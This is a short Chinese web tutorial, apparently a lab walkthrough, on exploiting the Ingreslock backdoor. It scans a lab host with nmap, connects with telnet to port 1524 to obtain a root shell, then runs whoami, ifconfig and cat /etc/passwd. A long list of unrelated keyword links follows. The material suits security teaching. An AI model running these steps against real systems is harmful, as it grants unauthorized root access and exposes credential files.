Ingreslock后门漏洞
发表于:2024-10-27 作者:千家信息网编辑
千家信息网最后更新 2024年10月27日,利用telnet命令连接目标主机的1524端口,直接获取root权限。Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于***一个暴露的服务器。
千家信息网最后更新 2024年10月27日Ingreslock后门漏洞
利用telnet命令连接目标主机的1524端口,直接获取root权限。
Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于***一个暴露的服务器。
一、 利用nmap工具扫描目标主机
1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择"在终端中打开"。
1.2 在终端中输入命令"nmap -sV 192.168.1.3",对目标主机进行端口扫描,发现开放1524端口。
1.3 在终端中输入命令"telnet 192.168.1.3 1524",连接目标主机1524端口,先是连接成功。如图3所示
1.4 在终端中输入命令"whoami",查找获取的权限。如图4所示
1.5 在终端中输入命令"ifconfig eth0",查看网卡信息,在终端下输入"cat /etc/passwd",查看远程主机的密码文件。
主机
命令
端口
终端
目标
输入
权限
如图
后门
成功
信息
密码
工具
文件
服务器
桌面
程序
空白
网卡
菜单
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
epr软件开发
ph1615aw有水量服务器吗
邮箱怎么检查发件服务器设置
数据库有查询和更新
科技和互联网行业的复
影像数据库文件损坏
软件开发个人发展规划
关于云服务器租赁采购讨论事宜
lol关闭服务器连接
单机软件开发前景
数据库建设采购硬件
个人云存储服务器搭建
索引及数据库安全
上海渔歌网络技术
企业网络安全检测
软件开发单位有所得税吗
嘉应学院数据库系统概论试卷
sql数据库表的内容怎么删
军队网络安全建设
数据库销售折扣流程
我的世界小号登录服务器
百度云服务器mqtt参数
三门县网络技术工作室
戴尔服务器带外管理默认ip
软件开发进入军队
友友互联网科技有限公司
服务器xen
sql数据库引擎端口
快吧游戏盒连接不上服务器
网络安全班会的目的跟意义